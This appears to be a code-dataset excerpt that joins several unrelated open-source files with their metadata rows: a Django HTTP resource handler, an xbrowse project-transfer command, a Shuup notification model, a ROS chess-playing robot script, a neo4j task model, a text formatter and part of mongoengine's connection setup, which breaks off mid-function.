# Check cache first
if etag is not None and etag in cache:
return etag
# If the Etag has been set already upstream use it, otherwise calculate
def set_etag(self, request, response):
if 'ETag' in response:
etag = parse_etags(response['ETag'])[0]
else:
etag = hashlib.md5(response.content).hexdigest()
response['ETag'] = quote_etag(etag)
# Cache the etag for subsequent look ups. This can be cached
# indefinitely since these are unique values
cache = self.get_cache(request, response)
cache.set(etag, 1, MAX_CACHE_AGE)
# ### Get/Calculate Last Modified Datetime
# Calculates the last modified time for the requested entity.
# Provides the client the last modified of the entity for future
# conditional requests.
def get_last_modified(self, request, *args, **kwargs):
return datetime.now()
# Set the last modified date on the response
def set_last_modified(self, request, response):
if 'Last-Modified' not in response:
response['Last-Modified'] = self.get_last_modified(request)
# ### Calculate Expiry Datetime
# (not implemented)
# Gets the expiry date and time for the requested entity.
# Informs the client when the entity will be invalid. This is most
# useful for clients to only refresh when they need to, otherwise the
# client's local cache is used.
def get_expiry(self, request, cache_timeout=None):
if cache_timeout is None:
cache_timeout = self.cache_max_age
return time.time() + cache_timeout
def set_expiry(self, request, response, cache_timeout=None):
if 'Expires' not in response:
response['Expires'] = http_date(
self.get_expiry(request, cache_timeout))
# ## Entity Content-* handlers
# Check if the request Content-Type is supported by this resource
# for decoding.
def content_type_supported(self, request, response, *args, **kwargs):
content_type = request.META['CONTENT_TYPE']
mimetypes = list(self.supported_content_types)
mimetypes.reverse()
match = mimeparse.best_match(mimetypes, content_type)
if match:
request._content_type = match
return True
return False
def content_encoding_supported(self, request, response, *args, **kwargs):
return True
def content_language_supported(self, request, response, *args, **kwargs):
return True
# Utility methods
def get_cache(self, request, response):
"Returns the cache to be used for various components."
from django.core.cache import cache
return cache
def get_cache_timeout(self, request, response):
if isinstance(self.cache_max_age, timedelta):
return datetime.now() + self.cache_max_age
return self.cache_max_age
def response_cache_control(self, request, response):
attrs = {}
timeout = self.get_cache_timeout(request, response)
# If explicitly 0, do not apply max-age or expires
if isinstance(timeout, datetime):
response['Expires'] = http_date(timegm(timeout.utctimetuple()))
elif isinstance(timeout, int):
if timeout <= 0:
timeout = 0
attrs['no_cache'] = True
attrs['max_age'] = timeout
if self.cache_must_revalidate:
attrs['must_revalidate'] = True
if self.cache_no_store:
attrs['no_store'] = True
if self.cache_type:
attrs[self.cache_type] = True
if attrs:
patch_cache_control(response, **attrs)
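# Hedged illustration (header text assumes Django's patch_cache_control
# formatting, and attribute order may differ): with cache_max_age=300 and
# cache_type='private', a GET response would carry roughly
# `Cache-Control: max-age=300, private`; with cache_max_age=0 it would carry
# roughly `Cache-Control: max-age=0, no-cache`.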
# Process methods
def process_request(self, request, *args, **kwargs):
# Initialize a new response for this request. Passing the response along
# the request cycle allows for gradual modification of the headers.
response = HttpResponse()
# TODO keep track of a list of request headers used to
# determine the resource representation for the 'Vary'
# header.
# ### 503 Service Unavailable
# The server does not need to be unavailable for a resource to be
# unavailable...
if self.is_service_unavailable(request, response, *args, **kwargs):
response.status_code = codes.service_unavailable
return response
# ### 414 Request URI Too Long _(not implemented)_
# This should be handled upstream by the Web server
# ### 400 Bad Request _(not implemented)_
# Note that many services respond with this code when entities are
# unprocessable. This should really be a 422 Unprocessable Entity
# Most actually bad requests are handled upstream by the Web server
# when parsing the HTTP message
# ### 401 Unauthorized
# Check if the request is authorized to access this resource.
if self.is_unauthorized(request, response, *args, **kwargs):
response.status_code = codes.unauthorized
return response
# ### 403 Forbidden
# Check if this resource is forbidden for the request.
if self.is_forbidden(request, response, *args, **kwargs):
response.status_code = codes.forbidden
return response
# ### 501 Not Implemented _(not implemented)_
# This technically refers to a service-wide response for an
# unimplemented request method, again this is upstream.
# ### 429 Too Many Requests
# Both `rate_limit_count` and `rate_limit_seconds` must be non-falsy
# values for the check to be applied.
if self.rate_limit_count and self.rate_limit_seconds:
if self.is_too_many_requests(request, response, *args, **kwargs):
response.status_code = codes.too_many_requests
return response
# ### 405 Method Not Allowed
if self.is_method_not_allowed(request, response, *args, **kwargs):
response.status_code = codes.method_not_allowed
return response
# ### 406 Not Acceptable
# Checks Accept and Accept-* headers
if self.is_not_acceptable(request, response, *args, **kwargs):
response.status_code = codes.not_acceptable
return response
# ### Process an _OPTIONS_ request
# Enough processing has been performed to allow an OPTIONS request.
if request.method == methods.OPTIONS and 'OPTIONS' in \
self.allowed_methods:
return self.options(request, response)
# ## Request Entity Checks
# ### 415 Unsupported Media Type
# Check if the entity `Content-Type` supported for decoding.
if self.is_unsupported_media_type(request, response, *args, **kwargs):
response.status_code = codes.unsupported_media_type
return response
# ### 413 Request Entity Too Large
# Check if the entity is too large for processing
if self.is_request_entity_too_large(request, response, *args,
**kwargs):
response.status_code = codes.request_entity_too_large
return response
# ### 404 Not Found
# Check if this resource exists. Note, if this requires a database
# lookup or some other expensive lookup, the relevant object may
# be _attached_ to the request or response object to be used
# downstream in the handler. This prevents multiple database
# hits or filesystem lookups.
if self.is_not_found(request, response, *args, **kwargs):
response.status_code = codes.not_found
return response
# ### 410 Gone
# Check if this resource used to exist, but does not anymore. A common
# strategy for this in a database context is to have an `archived` or
# `deleted` flag associated with the given lookup key while the rest of
# the content in the row may be deleted.
if self.is_gone(request, response, *args, **kwargs):
response.status_code = codes.gone
return response
# ### 428 Precondition Required
# Prevents the "lost udpate" problem and requires client to confirm
# the state of the resource has not changed since the last `GET`
# request. This applies to `PUT` and `PATCH` requests.
if request.method == methods.PUT or request.method == methods.PATCH:
if self.is_precondition_required(request, response, *args,
**kwargs):
return UncacheableResponse(status=codes.precondition_required)
# ### 412 Precondition Failed
# Conditional requests apply to GET, HEAD, PUT, and PATCH.
# For GET and HEAD, the request checks either whether the entity changed
# since the last time it was requested, `If-Modified-Since`, or whether
# the entity tag (ETag) has changed, `If-None-Match`.
if request.method == methods.PUT or request.method == methods.PATCH:
if self.is_precondition_failed(request, response, *args, **kwargs):
return UncacheableResponse(status=codes.precondition_failed)
# Check for conditional GET or HEAD request
if request.method == methods.GET or request.method == methods.HEAD:
# Check Etags before Last-Modified...
if self.use_etags and 'HTTP_IF_NONE_MATCH' in request.META:
# Parse request Etags (only one is currently supported)
request_etag = parse_etags(
request.META['HTTP_IF_NONE_MATCH'])[0]
# Check if the request Etag is valid. The current Etag is
# supplied to enable strategies where the resource does not need
# to be re-read to regenerate the Etag. This may include
# generating an MD5 of the resource and storing it as a key
# in memcache.
etag = self.get_etag(request, response, request_etag, *args,
**kwargs)
# Nothing has changed, simply return
if request_etag == etag:
response.status_code = codes.not_modified
return response
if self.use_last_modified and 'HTTP_IF_MODIFIED_SINCE' in \
request.META:
# Get the last known modified date from the client, compare it
# to the last modified date of the resource
last_modified = self.get_last_modified(request, *args,
**kwargs)
known_last_modified = EPOCH_DATE + timedelta(
seconds=parse_http_date(
request.META['HTTP_IF_MODIFIED_SINCE']))
if known_last_modified >= last_modified:
response.status_code = codes.not_modified
return response
if get_content_length(request):
content_type = request._content_type
if content_type in serializers:
if isinstance(request.body, bytes):
data = serializers.decode(content_type,
request.body.decode('utf-8'))
else:
data = serializers.decode(content_type, request.body)
request.data = data
# ## Process the normal response returned by the handler
def process_response(self, request, response):
# Set default content-type for no content response
if no_content_response(response):
# Do not alter the content-type if an attachment is supplied
if 'Content-Disposition' not in response:
accept_type = self.get_accept_type(request)
if accept_type:
response['Content-Type'] = accept_type
if request.method != methods.HEAD and response.status_code == \
codes.ok:
response.status_code = codes.no_content
# Set content to nothing after no content is handled since it must
# retain the properties of the GET response
if request.method == methods.HEAD:
response.content = ''
if request.method in (methods.GET, methods.HEAD):
self.response_cache_control(request, response)
if self.use_etags:
self.set_etag(request, response)
if self.use_last_modified:
self.set_last_modified(request, response)
return response
class TemplateResource(TemplateResponseMixin, Resource):
pass
|
bsd-2-clause
| -3,642,157,530,269,288,400
| 40.557647
| 79
| 0.635602
| false
| 4.314118
| false
| false
| false
|
macarthur-lab/xbrowse
|
xbrowse_server/base/management/commands/transfer_dataset_from_other_project.py
|
1
|
6685
|
from django.core import serializers
import os
from datetime import datetime
from django.core.management.base import BaseCommand
from xbrowse_server.base.models import Project, ProjectCollaborator, Project, \
Family, FamilyImageSlide, Cohort, Individual, \
FamilySearchFlag, ProjectPhenotype, IndividualPhenotype, FamilyGroup, \
CausalVariant, ProjectTag, VariantTag, VariantNote, ReferencePopulation, \
UserProfile, VCFFile, ProjectGeneList
from xbrowse_server.mall import get_project_datastore, get_datastore
from pprint import pprint
from xbrowse_server import sample_management
def update(mongo_collection, match_json, set_json):
print("-----")
print("updating %s to %s" % (match_json, set_json))
#return
update_result = mongo_collection.update_many(match_json, {'$set': set_json})
print("updated %s out of %s records" % (update_result.modified_count, update_result.matched_count))
return update_result
def update_family_analysis_status(project_id):
for family in Family.objects.filter(project__project_id=project_id):
if family.analysis_status == "Q" and family.get_data_status() == "loaded":
print("Setting family %s to Analysis in Progress" % family.family_id)
family.analysis_status = "I" # switch status from Waiting for Data to Analysis in Progress
family.save()
def check_that_exists(mongo_collection, match_json, not_more_than_one=False):
#return
records = list(mongo_collection.find(match_json))
if len(records) == 0:
print("%s query %s matched 0 records" % (mongo_collection, match_json))
return False
if not_more_than_one and len(records) > 1:
print("%s query %s matched more than one record: %s" % (mongo_collection, match_json, records))
return False
print("-----")
print("%s query %s returned %s record(s): \n%s" % (mongo_collection, match_json, len(records), "\n".join(map(str, records))))
return True
class Command(BaseCommand):
def add_arguments(self, parser):
parser.add_argument('-d', '--destination-project', help="project id to which to transfer the datasets", required=True)
parser.add_argument('-f', '--from-project', help="project id from which to take the datasets", required=True)
def transfer_project(self, from_project_id, destination_project_id):
print("From: " + from_project_id)
print("To: " + destination_project_id)
from_project = Project.objects.get(project_id=from_project_id)
destination_project = Project.objects.get(project_id=destination_project_id)
# Make sure individuals are the same
indivs_missing_from_dest_project = (set(
[i.indiv_id for i in Individual.objects.filter(project=from_project)]) - set(
[i.indiv_id for i in Individual.objects.filter(project=destination_project)]))
if indivs_missing_from_dest_project:
raise Exception("Individuals missing from dest project: " + str(indivs_missing_from_dest_project))
# update VCFs
vcfs = from_project.families_by_vcf().keys()
for vcf_file_path in vcfs:
vcf_file = VCFFile.objects.get_or_create(file_path=os.path.abspath(vcf_file_path))[0]
sample_management.add_vcf_file_to_project(destination_project, vcf_file)
print("Added %s to project %s" % (vcf_file, destination_project.project_id))
families_db = get_datastore()._db
projects_db = get_project_datastore()._db
print("==========")
print("Checking 'from' Projects and Families:")
if not check_that_exists(projects_db.projects, {'project_id': from_project_id}, not_more_than_one=True):
raise ValueError("There needs to be 1 project db in %(from_project_id)s" % locals())
if not check_that_exists(families_db.families, {'project_id': from_project_id}, not_more_than_one=False):
raise ValueError("There needs to be atleast 1 family db in %(from_project_id)s" % locals())
print("==========")
print("Make Updates:")
datestamp = datetime.now().strftime("%Y-%m-%d")
if check_that_exists(projects_db.projects, {'project_id': destination_project_id}, not_more_than_one=True):
result = update(projects_db.projects, {'project_id': destination_project_id}, {'project_id': destination_project_id+'_previous', 'version': datestamp})
if check_that_exists(families_db.families, {'project_id': destination_project_id}, not_more_than_one=False):
result = update(families_db.families, {'project_id': destination_project_id}, {'project_id': destination_project_id+'_previous', 'version': datestamp})
result = update(projects_db.projects, {'project_id': from_project_id}, {'project_id': destination_project_id, 'version': '2'})
result = update(families_db.families, {'project_id': from_project_id}, {'project_id': destination_project_id, 'version': '2'})
print("==========")
print("Checking Projects:")
if not check_that_exists(projects_db.projects, {'project_id': destination_project_id}, not_more_than_one=True):
raise ValueError("After: There needs to be 1 project db in %(destination_project_id)s" % locals())
if not check_that_exists(families_db.families, {'project_id': destination_project_id}, not_more_than_one=False):
raise ValueError("After: There needs to be atleast 1 family db in %(destination_project_id)s" % locals())
update_family_analysis_status(destination_project_id)
print("Data transfer finished.")
i = raw_input("Delete the 'from' project: %s? [Y/n] " % from_project_id)
if i.strip() == 'Y':
sample_management.delete_project(from_project_id)
print("Project %s deleted" % from_project_id)
else:
print("Project not deleted")
def handle(self, *args, **options):
from_project_id = options["from_project"]
destination_project_id = options["destination_project"]
assert from_project_id
assert destination_project_id
print("Transfering data from project %s to %s" % (from_project_id, destination_project_id))
print("WARNING: this can only be done once")
if raw_input("Continue? [Y/n] ").lower() != 'y':
return
else:
print("")
self.transfer_project(from_project_id, destination_project_id)
#for project in Project.objects.all():
# print("Project: " + project.project_id)
# update_family_analysis_status(project.project_id)
|
agpl-3.0
| 4,557,343,489,278,923,300
| 51.637795
| 163
| 0.653403
| false
| 3.738814
| false
| false
| false
|
suutari/shoop
|
shuup/notify/models/script.py
|
1
|
2353
|
# -*- coding: utf-8 -*-
# This file is part of Shuup.
#
# Copyright (c) 2012-2016, Shoop Commerce Ltd. All rights reserved.
#
# This source code is licensed under the AGPLv3 license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import unicode_literals
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
from django.utils.translation import ugettext_lazy as _
from jsonfield.fields import JSONField
from shuup.core.fields import InternalIdentifierField
from shuup.notify.base import Event
from shuup.notify.enums import StepNext
@python_2_unicode_compatible
class Script(models.Model):
event_identifier = models.CharField(max_length=64, blank=False, db_index=True, verbose_name=_('event identifier'))
identifier = InternalIdentifierField(unique=True)
created_on = models.DateTimeField(auto_now_add=True, editable=False, verbose_name=_('created on'))
name = models.CharField(max_length=64, verbose_name=_('name'))
enabled = models.BooleanField(default=False, db_index=True, verbose_name=_('enabled'))
    _step_data = JSONField(default=list, db_column="step_data")  # callable default avoids a shared mutable list
def get_steps(self):
"""
        :rtype: Iterable[Step]
"""
if getattr(self, "_steps", None) is None:
from shuup.notify.script import Step
self._steps = [Step.unserialize(data) for data in self._step_data]
return self._steps
def set_steps(self, steps):
self._step_data = [step.serialize() for step in steps]
self._steps = steps
def get_serialized_steps(self):
return [step.serialize() for step in self.get_steps()]
def set_serialized_steps(self, serialized_data):
self._steps = None
self._step_data = serialized_data
# Poor man's validation
for step in self.get_steps():
pass
@property
def event_class(self):
return Event.class_for_identifier(self.event_identifier)
def __str__(self):
return self.name
def execute(self, context):
"""
Execute the script in the given context.
:param context: Script context
:type context: shuup.notify.script.Context
"""
for step in self.get_steps():
if step.execute(context) == StepNext.STOP:
break
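# Hedged usage sketch (an assumption for illustration, not part of Shuup itself):
#     script = Script(event_identifier="order_received", name="Notify staff")
#     script.set_serialized_steps(step_data)  # step_data: a list of serialized Step dicts
#     script.save()
#     script.execute(context)                 # context: a shuup.notify.script.Context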
|
agpl-3.0
| 998,860,068,812,881,000
| 33.602941
| 118
| 0.666383
| false
| 3.915141
| false
| false
| false
|
mkhuthir/catkin_ws
|
src/chessbot/src/r2_chess_pgn.py
|
1
|
2487
|
#!/usr/bin/python
import sys, rospy, tf, moveit_commander, random
from geometry_msgs.msg import Pose, Point, Quaternion
import pgn
class R2ChessboardPGN:
def __init__(self):
self.left_arm = moveit_commander.MoveGroupCommander("left_arm")
self.left_hand = moveit_commander.MoveGroupCommander("left_hand")
def setGrasp(self, state):
if state == "pre-pinch":
vec = [ 0.3, 0, 1.57, 0, # index
-0.1, 0, 1.57, 0, # middle
0, 0, 0, # ring
0, 0, 0, # pinkie
0, 1.1, 0, 0] # thumb
elif state == "pinch":
vec = [ 0, 0, 1.57, 0,
0, 0, 1.57, 0,
0, 0, 0,
0, 0, 0,
0, 1.1, 0, 0]
elif state == "open":
vec = [0] * 18
else:
raise ValueError("unknown hand state: %s" % state)
self.left_hand.set_joint_value_target(vec)
self.left_hand.go(True)
def setPose(self, x, y, z, phi, theta, psi):
orient = \
Quaternion(*tf.transformations.quaternion_from_euler(phi, theta, psi))
pose = Pose(Point(x, y, z), orient)
self.left_arm.set_pose_target(pose)
self.left_arm.go(True)
def setSquare(self, square, height_above_board):
if len(square) != 2 or not square[1].isdigit():
raise ValueError(
"expected a chess rank and file like 'b3' but found %s instead" %
square)
print "going to %s" % square
rank_y = -0.24 - 0.05 * int(square[1])
file_x = 0.5 - 0.05 * (ord(square[0]) - ord('a'))
z = float(height_above_board) + 1.0
self.setPose(file_x, rank_y, z, 3.14, 0.3, -1.57)
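    # Worked example of the mapping above (derived directly from the formulas):
    # for square 'b3', file_x = 0.5 - 0.05 * (ord('b') - ord('a')) = 0.45 and
    # rank_y = -0.24 - 0.05 * 3 = -0.39, with z = height_above_board + 1.0.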
def playGame(self, pgn_filename):
game = pgn.loads(open(pgn_filename).read())[0]
self.setGrasp("pre-pinch")
self.setSquare("a1", 0.15)
for move in game.moves:
self.setSquare(move[0:2], 0.10)
self.setSquare(move[0:2], 0.015)
self.setGrasp("pinch")
self.setSquare(move[0:2], 0.10)
self.setSquare(move[2:4], 0.10)
self.setSquare(move[2:4], 0.015)
self.setGrasp("pre-pinch")
self.setSquare(move[2:4], 0.10)
if __name__ == '__main__':
moveit_commander.roscpp_initialize(sys.argv)
    rospy.init_node('r2_chess_pgn', anonymous=True)
argv = rospy.myargv(argv=sys.argv) # filter out any arguments used by ROS
if len(argv) != 2:
print "usage: r2_chess_pgn.py PGNFILE"
sys.exit(1)
print "playing %s" % argv[1]
r2pgn = R2ChessboardPGN()
r2pgn.playGame(argv[1])
moveit_commander.roscpp_shutdown()
|
gpl-3.0
| 6,829,077,378,582,487,000
| 33.068493
| 76
| 0.582228
| false
| 2.735974
| false
| false
| false
|
cuoretech/dowork
|
dowork/Model/Task.py
|
1
|
8188
|
from database_config import *
from datetime import datetime
from py2neo import neo4j, node
# Class : Task
# Methods:
#       1) db_init(self) - Private
#       2) getNode(self) - Returns the Task Node
#       3) getName(self) - Returns name of task
#       4) setDescription(self, description) - Takes description as a string
#       5) getDescription(self) - Gets the description as a string
#       6) setEndTime(self, eTime) - Sets eTime in millis
#       7) getEndTime(self) - Gets eTime in millis
#       8) setInvestedTime(self, iTime) - Sets iTime in millis
#       9) getInvestedTime(self) - Gets iTime in millis
#       10) setDeadline(self, deadline) - Sets the deadline in millis
#       11) getDeadline(self) - Gets the deadline in millis
#       12) setPriority(self, priority) - Sets the priority of the task
#       13) getPriority(self) - Gets the priority of the task
#       14) assignToUser(self, user) - user is a node, Owner.getNode()
#       15) getAssignedUsers(self) - Returns a list of 'Node' Objects containing the User Nodes
#       16) setStatus(self, Status) - Status should be one of the STS Constants contained in Task
#       17) getStatus(self) - Returns status of Task
#       18) addSubTask(self, subtask) - Takes a (Task Node) subTask, returns a 'Path' object
#                                       containing nodes and relationships used
#       19) getSubTasks(self) - Returns a list of subtasks the current task has
#       20) addFile(self, file) - Adds a file to the task
#       21) getFiles(self) - Returns a list of File Nodes
#
# Properties:
# 1) name
# 2) description
# 3) eTime
# 4) iTime
# 5) deadline
# 6) priority
# 7) status
STS_OPEN = "Open"
STS_CLOSED = "Closed"
STS_IN_PROG = "In_Progress"
class Task:
graph_db = None
taskInstance = None
def db_init(self):
if self.graph_db is None:
self.graph_db = neo4j.GraphDatabaseService(db_config['uri'])
#
# Function : getNode
# Arguments :
# Returns : TaskInstance Node
#
def getNode(self):
return self.taskInstance
#
# Function : Constructor
# Arguments : Uri of Existing Task Node OR Name of Task
#
def __init__(self, URI=None, Name=None, Status=None):
global LBL_TASK
self.db_init()
tempTask = None
if URI is not None:
tempTask = neo4j.Node(URI)
elif Name is not None and Status is not None:
tempTask = self.graph_db.get_or_create_indexed_node(IND_TASK, "nametime", Name+str(datetime.now()), {"name": Name, "status": Status})
tempTask.add_labels(LBL_TASK)
else:
raise Exception("Name/Status or URI not specified")
self.taskInstance = tempTask
if self.getUpdateTime() is None:
self.setUpdateTime()
    #
    # Function : __str__
# Arguments :
# Returns : name of task
#
def __str__(self):
if self.taskInstance is not None:
return self.taskInstance["name"]
else:
return None
#
# Function : getName
# Arguments :
# Returns : name of task
#
def getName(self):
if self.taskInstance is not None:
return self.taskInstance["name"]
else:
return None
#
# Function : setDescription
# Arguments : (String) description
#
def setDescription(self, description):
self.taskInstance["description"] = description
#
# Function : getDescription
# Arguments :
# Returns : (String) description
#
def getDescription(self):
return self.taskInstance["description"];
#
# Function : setEndTime
# Arguments : eTime in millis
# Returns :
#
def setEndTime(self, eTime):
self.taskInstance["eTime"] = eTime
#
# Function : getEndTime
# Arguments :
# Returns : eTime in millis
#
def getEndTime(self):
return self.taskInstance["eTime"]
#
    # Function : setUpdateTime
    # Arguments : none - stores the current datetime as uTime
    # Returns :
#
def setUpdateTime(self):
self.taskInstance['uTime'] = datetime.now()
#
# Function : getUpdateTime
# Arguments :
# Returns : (String) uTime
#
def getUpdateTime(self):
return self.taskInstance['uTime']
#
# Function : setInvestedTime
# Arguments : iTime
# Returns :
#
def setInvestedTime(self, iTime):
self.taskInstance["iTime"] = iTime
#
# Function : getInvestedTime
# Arguments :
# Returns : iTime in millis
#
def getInvestedTime(self):
return self.taskInstance["iTime"]
#
# Function : setDeadline
# Arguments : deadline
# Returns :
#
def setDeadline(self, deadline):
self.taskInstance["deadline"] = deadline
#
# Function : getDeadline
# Arguments :
# Returns : list of deadlines for the task
#
def getDeadline(self):
return self.taskInstance["deadline"]
#
# Function : setPriority
# Arguments : priority integer as string
# Returns :
#
def setPriority(self, priority):
self.taskInstance["priority"] = priority
#
# Function : getPriority
# Arguments :
# Returns : priority as string
#
def getPriority(self):
return self.taskInstance["priority"]
#
# Function : assignToUser
    # Arguments : (User Node) user
# Returns : a 'Path' object containing nodes and relationships used
#
def assignToUser(self, user):
global REL_ASSIGNEDTO, LBL_USER
if LBL_USER in user.get_labels():
return self.taskInstance.get_or_create_path(REL_ASSIGNEDTO, user)
else:
raise Exception("The Node Provided is not a User")
#
# Function : getAssignedUsers
# Arguments :
# Returns : a list of 'Node' Objects containing the User Nodes
#
def getAssignedUsers(self):
global REL_ASSIGNEDTO
users = list()
for relationship in list(self.taskInstance.match_outgoing(REL_ASSIGNEDTO)):
users.append(relationship.end_node)
return users
#
# Function : setStatus
# Arguments : (String) Status
# Returns :
#
def setStatus(self, Status):
self.taskInstance["status"] = Status
#
# Function : getStatus
# Arguments :
# Returns : Status of Task
#
def getStatus(self):
return self.taskInstance["status"]
#
# Function : addSubTask
# Arguments : (Task Node) subTask
# Returns : a 'Path' object containing nodes and relationships used
#
def addSubTask(self, subtask):
global REL_HASSUBTASK, LBL_TASK
if subtask is not None and LBL_TASK in subtask.get_labels():
return self.taskInstance.get_or_create_path(REL_HASSUBTASK, subtask)
else:
raise Exception("Please supply a proper Task Node(Task in Labels")
#
# Function : getSubTask
# Arguments :
# Returns : a list of subtasks the current task has
#
def getSubTasks(self):
global REL_HASSUBTASK
subTasks = list()
for relationship in list(self.taskInstance.match_outgoing(REL_HASSUBTASK)):
subTasks.append(relationship.end_node)
return subTasks
#
# Function : addFile
# Arguments : File Node
# Returns : a 'Path' object
#
def addFile(self, File):
global LBL_FILE, REL_HASFILE
if File is not None and LBL_FILE in File.get_labels():
return self.taskInstance.get_or_create_path(REL_HASFILE, File)
else:
raise Exception("Please supply a proper File Node (Node in Label)")
#
# Function : getFiles
# Arguments :
# Returns : a list of File Nodes
#
def getFiles(self):
global REL_HASFILE
files = list()
for relationship in list(self.taskInstance.match_outgoing(REL_HASFILE)):
files.append(relationship.end_node)
return files
# Clears the entire DB for dev purposes
def clear(self):
self.graph_db.clear()
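# Hypothetical usage sketch (values are placeholders, not from the original module):
#     task = Task(Name="Write report", Status=STS_OPEN)
#     task.setDeadline(1500000000000)           # millis, per the setter contracts above
#     sub = Task(Name="Draft outline", Status=STS_OPEN)
#     task.addSubTask(sub.getNode())            # expects a node carrying the LBL_TASK label
#     task.setStatus(STS_IN_PROG)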
|
apache-2.0
| 1,286,026,942,883,633,700
| 27.237931
| 145
| 0.605154
| false
| 3.580236
| false
| false
| false
|
mfnch/pyrtist
|
pyrtist/lib2d/text_formatter.py
|
1
|
3338
|
# Copyright (C) 2017, 2020 Matteo Franchin
#
# This file is part of Pyrtist.
# Pyrtist is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 2.1 of the License, or
# (at your option) any later version.
#
# Pyrtist is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Pyrtist. If not, see <http://www.gnu.org/licenses/>.
try:
from cStringIO import StringIO # Python 2
except ImportError:
from io import StringIO # Python 3
__all__ = ('TextFormatter',)
class TextFormatter(object):
def __init__(self):
self.max_stack_level = 10
self.out = StringIO()
self.states = []
self.level = 0
self.string = None
self.cursor = 0
def push_state(self, old_state, new_state):
self.states.append(old_state)
return new_state
def pop_state(self):
return self.states.pop()
def pop_text(self):
ret = self.out.getvalue()
self.out = StringIO()
self.out.truncate()
return ret
def run(self, string):
self.cursor = 0
self.string = string
fn = self._state_normal
while self.cursor < len(self.string):
c = self.string[self.cursor]
fn = fn(c)
self.cmd_draw()
def _state_normal(self, c):
self.cursor += 1
if c == '_':
return self._state_wait_sub
if c == '^':
return self._state_wait_sup
if c == '\\':
return self.push_state(self._state_normal, self._state_literal)
if c == '}':
if self.level > 0:
self.cmd_draw()
self.cmd_restore()
self.level -= 1
return self._state_normal
elif c == '\n':
self.cmd_draw()
self.cmd_newline()
else:
self.out.write(c)
return self._state_normal
def _state_single(self, c):
self.cursor += 1
if c == '\n':
# Ignore newlines.
return self._state_single
if c == '\\':
return self.push_state(self._state_single, self._state_literal)
self.out.write(c)
self.cmd_draw()
self.cmd_restore()
return self._state_normal
def _state_literal(self, c):
self.cursor += 1
self.out.write(c)
return self.pop_state()
def _state_wait_sup(self, c):
return self._state_wait_sub(c, sup=True)
def _state_wait_sub(self, c, sup=False):
self.cursor += 1
if c in '_^':
if (c == '^') == sup:
self.out.write(c)
return self._state_normal
self.cmd_draw()
self.cmd_save()
if sup:
self.cmd_superscript()
else:
self.cmd_subscript()
if c != '{':
self.cursor -= 1
return self._state_single
self.level += 1
return self._state_normal
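# Note: TextFormatter never defines the cmd_* hooks it calls (cmd_draw, cmd_save,
# cmd_restore, cmd_newline, cmd_superscript, cmd_subscript); a consumer is expected
# to provide them. A minimal sketch of such a subclass (an assumption for
# illustration, not part of Pyrtist):
#     class PrintingFormatter(TextFormatter):
#         def cmd_draw(self): print('draw:', self.pop_text())
#         def cmd_save(self): pass
#         def cmd_restore(self): pass
#         def cmd_newline(self): pass
#         def cmd_superscript(self): pass
#         def cmd_subscript(self): pass
#     PrintingFormatter().run('H_2O and E = mc^2')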
|
lgpl-2.1
| -1,941,142,295,996,412,400
| 27.775862
| 76
| 0.547933
| false
| 3.863426
| false
| false
| false
|
ganeshcmohan/mongoengine.0.8.7_v1
|
mongoengine/connection.py
|
1
|
5806
|
import pymongo
from pymongo import MongoClient, MongoReplicaSetClient, uri_parser
__all__ = ['ConnectionError', 'connect', 'register_connection',
'DEFAULT_CONNECTION_NAME']
DEFAULT_CONNECTION_NAME = 'default'
class ConnectionError(Exception):
pass
_connection_settings = {}
_connections = {}
_dbs = {}
def register_connection(alias, name, host=None, port=None,
is_slave=False, read_preference=False, slaves=None,
username=None, password=None, **kwargs):
"""Add a connection.
:param alias: the name that will be used to refer to this connection
throughout MongoEngine
:param name: the name of the specific database to use
:param host: the host name of the :program:`mongod` instance to connect to
:param port: the port that the :program:`mongod` instance is running on
:param is_slave: whether the connection can act as a slave
        ** Deprecated in pymongo 2.0.1+
    :param read_preference: The read preference for the collection
        ** Added in pymongo 2.1
:param slaves: a list of aliases of slave connections; each of these must
be a registered connection that has :attr:`is_slave` set to ``True``
:param username: username to authenticate with
:param password: password to authenticate with
:param kwargs: allow ad-hoc parameters to be passed into the pymongo driver
"""
global _connection_settings
conn_settings = {
'name': name,
'host': host or 'localhost',
'port': port or 27017,
'is_slave': is_slave,
'slaves': slaves or [],
'username': username,
'password': password,
#'read_preference': read_preference
}
# Handle uri style connections
if "://" in conn_settings['host']:
uri_dict = uri_parser.parse_uri(conn_settings['host'])
conn_settings.update({
'name': uri_dict.get('database') or name,
'username': uri_dict.get('username'),
'password': uri_dict.get('password'),
#'read_preference': read_preference,
})
if "replicaSet" in conn_settings['host']:
conn_settings['replicaSet'] = True
conn_settings.update(kwargs)
_connection_settings[alias] = conn_settings
def disconnect(alias=DEFAULT_CONNECTION_NAME):
global _connections
global _dbs
if alias in _connections:
get_connection(alias=alias).disconnect()
del _connections[alias]
if alias in _dbs:
del _dbs[alias]
def get_connection(alias=DEFAULT_CONNECTION_NAME, reconnect=False):
global _connections
# Connect to the database if not already connected
if reconnect:
disconnect(alias)
if alias not in _connections:
if alias not in _connection_settings:
msg = 'Connection with alias "%s" has not been defined' % alias
if alias == DEFAULT_CONNECTION_NAME:
msg = 'You have not defined a default connection'
raise ConnectionError(msg)
conn_settings = _connection_settings[alias].copy()
if hasattr(pymongo, 'version_tuple'): # Support for 2.1+
conn_settings.pop('name', None)
conn_settings.pop('slaves', None)
conn_settings.pop('is_slave', None)
conn_settings.pop('username', None)
conn_settings.pop('password', None)
else:
# Get all the slave connections
if 'slaves' in conn_settings:
slaves = []
for slave_alias in conn_settings['slaves']:
slaves.append(get_connection(slave_alias))
conn_settings['slaves'] = slaves
conn_settings.pop('read_preference', None)
connection_class = MongoClient
if 'replicaSet' in conn_settings:
conn_settings['hosts_or_uri'] = conn_settings.pop('host', None)
# Discard port since it can't be used on MongoReplicaSetClient
conn_settings.pop('port', None)
# Discard replicaSet if not base string
if not isinstance(conn_settings['replicaSet'], basestring):
conn_settings.pop('replicaSet', None)
connection_class = MongoReplicaSetClient
try:
_connections[alias] = connection_class(**conn_settings)
except Exception, e:
raise ConnectionError("Cannot connect to database %s :\n%s" % (alias, e))
return _connections[alias]
def get_db(alias=DEFAULT_CONNECTION_NAME, reconnect=False):
global _dbs
if reconnect:
disconnect(alias)
if alias not in _dbs:
